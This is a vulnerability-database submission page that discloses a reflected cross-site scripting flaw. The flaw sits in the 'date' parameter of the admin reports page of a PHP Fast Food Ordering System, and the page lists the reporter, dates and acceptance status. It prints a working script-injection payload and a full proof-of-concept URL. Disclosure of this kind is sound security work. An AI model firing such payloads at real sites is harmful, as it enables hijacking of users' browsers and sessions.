| Titre | Ffos exists XSS |
|---|
| Description | /ffos/admin/reports/index.php Line 18 of index.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.It is recommended to fix this vulnerability as soon as possible.
payload:\"><sCrIpT>alert(1)</sCrIpT>"
The verification and utilization of this vulnerability is very simple. It can be verified by using URL + payload:
url: http://localhost/ffos/admin/?page=reports&date=2022-08-27\%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E |
|---|
| La source | ⚠️ https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html |
|---|
| Utilisateur | 0x14d (UID 31582) |
|---|
| Soumission | 27/08/2022 06:21 (il y a 4 ans) |
|---|
| Modérer | 27/08/2022 10:44 (4 hours later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 207425 [oretnom23 Fast Food Ordering System admin/?page=reports Date cross site scripting] |
|---|
| Points | 16 |
|---|